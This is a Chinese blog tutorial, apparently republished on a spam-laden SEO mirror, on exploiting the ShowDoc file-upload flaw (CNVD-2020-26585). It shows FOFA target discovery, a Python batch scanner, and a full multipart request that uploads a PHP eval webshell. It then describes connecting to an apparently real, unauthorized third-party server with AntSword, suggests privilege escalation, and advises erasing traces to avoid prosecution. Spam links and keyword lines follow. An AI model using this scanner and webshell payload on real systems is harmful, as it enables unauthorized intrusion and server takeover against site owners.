当前位置: 首页 > news >正文 网页网站自做全搞定郑州做网站找赢博科技 news 2025/10/23 18:20:34 网页网站自做全搞定,郑州做网站找赢博科技,深圳外贸建站网络推广哪家好,wordpress 挂马漏洞参考#xff1a;ShowDoc文件上传漏洞#xff08;CNVD-2020-26585#xff09;_showdoc漏洞-CSDN博客 一、fofa 搜索使用该工具的网站 网络空间测绘#xff0c;网络空间安全搜索引擎#xff0c;网络空间搜索引擎#xff0c;安全态势感知 - FOFA网络空间测绘系统 S…参考ShowDoc文件上传漏洞CNVD-2020-26585_showdoc漏洞-CSDN博客 一、fofa 搜索使用该工具的网站 网络空间测绘网络空间安全搜索引擎网络空间搜索引擎安全态势感知 - FOFA网络空间测绘系统 ShowDoc 二、验证目标url是否存在漏洞 手动验证 在url后面拼接 ?s/home/page/uploadImg 如果能成功访问就说明有可能存在漏洞是否存在漏洞还需要后续进行上传测试 编写python脚本进行批量验证 首先你可以编写个搜索fofa的脚本用来收集目标ip 搜索ip脚本的编写教程Python教程如何用Python编写FOFA爬虫获取信息_fofa python-CSDN博客 然后就可以编写ip验证脚本 import requests# 读取本地的 ip.txt 文件 def read_urls(file_path):with open(file_path, r) as file:urls file.readlines()return [url.strip() for url in urls]# 测试 URL 是否存在漏洞 def test_vulnerabilities(urls, timeout3):endpoint /?s/home/page/uploadImgkeyword 没有上传的文件for url in urls:full_url url endpointtry:response requests.get(full_url, timeouttimeout)if response.status_code 200 and keyword in response.text:print(fPotential vulnerability found at: {full_url})else:pass# print(fNo vulnerability detected at: {full_url} (Status Code: {response.status_code}))except requests.RequestException as e:pass# print(fError accessing {full_url}: {e})# 主函数 def main():file_path ip.txturls read_urls(file_path)test_vulnerabilities(urls)if __name__ __main__:main() 三、尝试上传webshell 随便选择一个可能存在漏洞的url进行复现 使用bp抓包 发送到重发器 将请求改成post请求 然后在请求体后面加上payload payload Content-Type: multipart/form-data; boundary--------------------------921378126371623762173617 Content-Length: 257----------------------------921378126371623762173617 Content-Disposition: form-data; nameeditormd-image-file; filenametest.php Content-Type: text/plain?php eval($_POST[mima]);? ----------------------------921378126371623762173617-- 以下是对每部分的详细解释 Content-Type: multipart/form-data; boundary--------------------------921378126371623762173617: Content-Type: multipart/form-data 指定了请求的主体是 multipart/form-data 格式这种格式通常用于上传文件或包含多个部分的数据。boundary--------------------------921378126371623762173617 是分隔符它用于分隔请求中的各个部分。边界值用于在请求体中分隔不同的数据部分。 Content-Length: 257: 指示请求体的长度为 257 字节。这是请求体的总字节数包括所有分隔符和数据。 ----------------------------921378126371623762173617: 这是第一个分隔符表示请求体的开始。这是用来分隔请求中的第一个部分的边界。 Content-Disposition: form-data; nameeditormd-image-file; filenametest.php: Content-Disposition: form-data 表示这是表单数据的一部分。nameeditormd-image-file 指定了表单字段的名称这里是 editormd-image-file。filenametest.php 指定了上传文件的名称这里是 test.php。 Content-Type: text/plain: 指定了上传文件的 MIME 类型这里是 text/plain表示文件的内容是纯文本。 ?php eval($_POST[mima]);?: 这是文件 test.php 中的内容。它是一个 PHP 代码片段用于执行传入的 PHP 代码。eval($_POST[mima]); 会执行 POST 请求中 mima 字段的内容这可能会导致代码执行漏洞允许攻击者在服务器上执行任意代码。 ----------------------------921378126371623762173617--: 这是请求体的结束分隔符标志着请求体的结束。 四、使用工具蚁剑、菜刀、冰蝎、哥斯拉尝试连接webshell 这里用蚁剑演示复制链接至蚁剑将所有的“\”去除 去除 / 反斜杠后链接就会变成这样 http://14.***.***.152:8082/Public/Uploads/2024-08-22/66c744243f700.php 连接密码mima 可以连接后就可以进入虚拟终端执行一些命令比如查看当前权限 可以继续上传msf或cs的马进行操作提权但是我没有目标的授权就不继续下去了如果你需要学习这方面的知识可以订阅我的专栏49-4 内网渗透 - 不安全的服务权限提权_windows提权--不安全的服务权限的原理-CSDN博客 最后记住清除我们的渗透痕迹防止别人进行溯源起诉我们。 免责声明 欢迎访问我的博客。以下内容仅供教育和信息用途 合法性我不支持或鼓励非法活动。请确保遵守法律法规。 信息准确性尽管我尽力提供准确的信息但不保证其完全准确或适用。使用前请自行验证。 风险提示技术使用可能带来风险如系统损坏或数据丢失。请谨慎使用并自行承担风险。 责任限制我对使用博客内容产生的任何损害不承担责任。 第三方链接博客中的链接仅为方便用户内容不由我负责。 使用本博客即表示您同意以上条款。如果有疑问请联系我。 文章转载自: http://www.morning.pdbgm.cn.gov.cn.pdbgm.cn http://www.morning.qpqb.cn.gov.cn.qpqb.cn http://www.morning.ndtmz.cn.gov.cn.ndtmz.cn http://www.morning.cpwmj.cn.gov.cn.cpwmj.cn http://www.morning.sqnxk.cn.gov.cn.sqnxk.cn http://www.morning.blxlf.cn.gov.cn.blxlf.cn http://www.morning.jpbpc.cn.gov.cn.jpbpc.cn http://www.morning.tndhm.cn.gov.cn.tndhm.cn http://www.morning.hrtct.cn.gov.cn.hrtct.cn http://www.morning.mnrqq.cn.gov.cn.mnrqq.cn http://www.morning.mcpby.cn.gov.cn.mcpby.cn http://www.morning.fmkbk.cn.gov.cn.fmkbk.cn http://www.morning.cwlxs.cn.gov.cn.cwlxs.cn http://www.morning.qyjqj.cn.gov.cn.qyjqj.cn http://www.morning.nmkbl.cn.gov.cn.nmkbl.cn http://www.morning.txhls.cn.gov.cn.txhls.cn http://www.morning.dmsxd.cn.gov.cn.dmsxd.cn http://www.morning.fgxr.cn.gov.cn.fgxr.cn http://www.morning.xnltz.cn.gov.cn.xnltz.cn http://www.morning.cwlxs.cn.gov.cn.cwlxs.cn http://www.morning.cbpkr.cn.gov.cn.cbpkr.cn http://www.morning.vvdifactory.com.gov.cn.vvdifactory.com http://www.morning.cbpkr.cn.gov.cn.cbpkr.cn http://www.morning.bryyb.cn.gov.cn.bryyb.cn http://www.morning.ywndg.cn.gov.cn.ywndg.cn http://www.morning.mzgq.cn.gov.cn.mzgq.cn http://www.morning.pbdnj.cn.gov.cn.pbdnj.cn http://www.morning.plhyc.cn.gov.cn.plhyc.cn http://www.morning.xrqkm.cn.gov.cn.xrqkm.cn http://www.morning.xxknq.cn.gov.cn.xxknq.cn http://www.morning.ghwdm.cn.gov.cn.ghwdm.cn http://www.morning.ljxxl.cn.gov.cn.ljxxl.cn http://www.morning.xxknq.cn.gov.cn.xxknq.cn http://www.morning.tcxzn.cn.gov.cn.tcxzn.cn http://www.morning.xfhms.cn.gov.cn.xfhms.cn http://www.morning.rlhgx.cn.gov.cn.rlhgx.cn http://www.morning.lwtfx.cn.gov.cn.lwtfx.cn http://www.morning.yqndr.cn.gov.cn.yqndr.cn http://www.morning.zyytn.cn.gov.cn.zyytn.cn http://www.morning.hongjp.com.gov.cn.hongjp.com http://www.morning.zzgtdz.cn.gov.cn.zzgtdz.cn http://www.morning.ckntb.cn.gov.cn.ckntb.cn http://www.morning.jzfxk.cn.gov.cn.jzfxk.cn http://www.morning.ptwzy.cn.gov.cn.ptwzy.cn http://www.morning.rqckh.cn.gov.cn.rqckh.cn http://www.morning.sqqhd.cn.gov.cn.sqqhd.cn http://www.morning.nzwp.cn.gov.cn.nzwp.cn http://www.morning.qgxnw.cn.gov.cn.qgxnw.cn http://www.morning.sftpg.cn.gov.cn.sftpg.cn http://www.morning.rhjsx.cn.gov.cn.rhjsx.cn http://www.morning.trplf.cn.gov.cn.trplf.cn http://www.morning.lltdf.cn.gov.cn.lltdf.cn http://www.morning.hxbjt.cn.gov.cn.hxbjt.cn http://www.morning.vattx.cn.gov.cn.vattx.cn http://www.morning.nzxdz.cn.gov.cn.nzxdz.cn http://www.morning.bzlfw.cn.gov.cn.bzlfw.cn http://www.morning.xkzr.cn.gov.cn.xkzr.cn http://www.morning.xglgm.cn.gov.cn.xglgm.cn http://www.morning.gqdsm.cn.gov.cn.gqdsm.cn http://www.morning.yxgqr.cn.gov.cn.yxgqr.cn http://www.morning.xbtlt.cn.gov.cn.xbtlt.cn http://www.morning.ktrh.cn.gov.cn.ktrh.cn http://www.morning.srjgz.cn.gov.cn.srjgz.cn http://www.morning.hilmwmu.cn.gov.cn.hilmwmu.cn http://www.morning.wptrm.cn.gov.cn.wptrm.cn http://www.morning.lwhsp.cn.gov.cn.lwhsp.cn http://www.morning.wjplm.cn.gov.cn.wjplm.cn http://www.morning.bpmfz.cn.gov.cn.bpmfz.cn http://www.morning.zfqdt.cn.gov.cn.zfqdt.cn http://www.morning.kkjhj.cn.gov.cn.kkjhj.cn http://www.morning.jbfzx.cn.gov.cn.jbfzx.cn http://www.morning.kdnrp.cn.gov.cn.kdnrp.cn http://www.morning.chzbq.cn.gov.cn.chzbq.cn http://www.morning.qmbtn.cn.gov.cn.qmbtn.cn http://www.morning.wqhlj.cn.gov.cn.wqhlj.cn http://www.morning.xbmwm.cn.gov.cn.xbmwm.cn http://www.morning.sqmlw.cn.gov.cn.sqmlw.cn http://www.morning.joinyun.com.gov.cn.joinyun.com http://www.morning.lanyee.com.cn.gov.cn.lanyee.com.cn http://www.morning.rltw.cn.gov.cn.rltw.cn 查看全文 http://www.tj-hxxt.cn/news/243189.html 相关文章: 网站加载不出来是什么原因如何不花钱建设网站 有了自己的域名怎么做网站海东市网站建设 浏览有关小城镇建设的网站6wordpress免费精品主题 保定网站制作计划动漫设计软件有哪些 做网站什么一级导航二级导航python做网站多么 网站建设长沙投百度做广告效果怎么样 京东网站网站建设是什么西双版纳傣族自治州地图高清版 网站引导页动态效果怎么做的关键词歌词 广西网站seo做微网站公司简介 网站服务器关闭怎么恢复聊天软件开发需要多少钱 网站建设需要什么语言服务器网站怎么做 怎样注册网站wordpress公司展示网站 校园网站建设情况通报大型门户网站程序 南京重庆网站建设广州网站推广 网站建设后如何检测网站建设系统服务 北京seo网站设计兰州网站设计厂家 成都电子商务网站建站北京3d效果图制作公司 海洋网络提供网站建设怎样做网站轮播 昆明门户网站宠物店网页设计素材 广告多的网站找专题页面那个网站好 如何在网站源码做授权西双版纳网站制作公司 企业网站 费用市场运营和市场营销的区别 网站和app的关系wordpress自动回复 成都 企业网站建设电商平面设计教程 郑州企业网站推广wordpress中的联系方式 落实网站建设培训班精神wordpress会员可见主题 织梦 商城网站营销型网站建设价格是多少 两支队伍建设专题网站南通优普企业网站建设 雄安建设网站制作360信息流广告平台 购物网站前端浮动特效怎么做磁力狗在线搜索
